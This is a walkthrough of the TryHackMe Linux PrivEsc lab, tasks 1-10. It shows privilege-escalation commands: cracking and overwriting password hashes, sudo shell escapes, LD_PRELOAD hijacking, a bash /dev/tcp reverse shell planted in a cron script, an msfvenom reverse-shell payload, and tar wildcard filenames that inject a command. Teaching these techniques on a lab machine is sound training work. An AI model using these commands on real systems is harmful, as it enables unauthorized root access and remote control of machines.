CHALLENGE OVERVIEW
- CTF Creator: Tib3rius
- Link: https://tryhackme.com/room/linuxprivesc
- Difficulty: medium
- Target: gaining root access using a variety of different techniques
- Highlight: Quickly gaining root access on a Linux computer in many different ways
- Tags: privesc, linux, privilege escalation
BACKGROUND
Using different exploits to compromise operating systems can feel like magic (when they work!).
In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.
You can find the remaining tasks in the following Finxter tutorial:
👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)
TASK 1 Deploy the Vulnerable Debian VM
After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.
export targetIP=10.10.63.231 export myIP=10.6.2.23
Now we can go ahead and log in via SSH using the starting credentials given in the instructions:
ssh user@10.10.63.231 id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Now that we are in via SSH, let’s start exploiting this machine!
TASK 2 Service Exploits
In this task, we will privesc by exploiting MySQL using https://www.exploit-db.com/exploits/1518
We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.
Task 3: Weak File Permissions – Readable /etc/shadow
In this task, we will read /etc/shadow and crack the hash with John the Ripper.
First, we need to save the root entry from /etc/shadow file as hash.txt.
Next, let’s load up John and crack the hash with rockyou.txt as our wordlist
john --wordlist=</PATH/TO/>rockyou.txt hash.txt
We have found our root password, password123!
TASK 4: Weak File Permissions – Writeable /etc/shadow
In this task, we will change the root password in /etc/shadow file.
mkpasswd -m sha-512 newpasswordhere $6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.
user@debian:~/tools/mysql-udf$ nano /etc/shadow user@debian:~/tools/mysql-udf$ su root Password: root@debian:/home/user/tools/mysql-udf#
TASK 5 Weak File Permissions – Writeable /etc/passwd
In this task, we will change the root passwd in /etc/passwd. First we need to generate a new hashed password:
openssl passwd newpasswordhere
TASK 6 Sudo – Shell Escape Sequences
Let’s check our sudo privileges:
sudo -l
We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins
Today we’ll choose to run the exploit utilizing the more bin file.
👉 Link: https://gtfobins.github.io/gtfobins/more/
Running the following two commands gives us a root shell:
TERM= sudo more /etc/profile !/bin/sh
TASK 7 Sudo – Environment Variables
Method 1: preload file spoofing
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c sudo LD_PRELOAD=/tmp/preload.so more
Method 2: shared object spoofing
ldd /usr/sbin/apache2 gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c sudo LD_LIBRARY_PATH=/tmp apache2
TASK 8 Cron Jobs – File Permissions
In this task, we will root the Linux box by changing the file overwrite.sh that is scheduled to run automatically every minute on cron jobs.
Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.
Overwrite the file with the following:
#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.
nc -lnvp 8888
TASK 9 Cron Jobs – PATH Environment Variable
In this task, we will hijack the PATH environment variable by creating an overwrite.sh file in /home/user directory.
user@debian:~$ cat overwrite.sh #!/bin/bash cp /bin/bash /tmp/rootbash chmod +xs /tmp/rootbash
This bash script will copy /bin/bash (the shell) to the tmp directory, then add execute privileges and an suid bit. After the overwrite.sh file runs, we can manually activate the root shell by running the new file “rootbash” with persistence mode.
user@debian:~$ /tmp/rootbash -p rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user) rootbash-4.1# exit
TASK 10 Cron Jobs – Wildcards
In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our netcat listener.
First, let’s create a new payload for a revshell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf
Next, we’ll transfer the elf file to /home/usr on the target via a simple HTTP server. Finally, we need to create two empty files with the following names:
touch /home/user/--checkpoint=1 touch /home/user/--checkpoint-action=exec=shell.elf
Finally, we’ll need to start up a netcat listener to catch the root shell.
nc -lnvp 8888
POST-EXPLOITATION
Let’s remove the shell and the other two spoofed empty command extension files.
rm /home/user/shell.elf rm /home/user/--checkpoint=1 rm /home/user/--checkpoint-action=exec=shell.elf
FINAL THOUGHTS
Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.
As long as the target machine has a misconfiguration on password files (/etc/shadow and/or /etc/passwd), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.
Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods:
👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.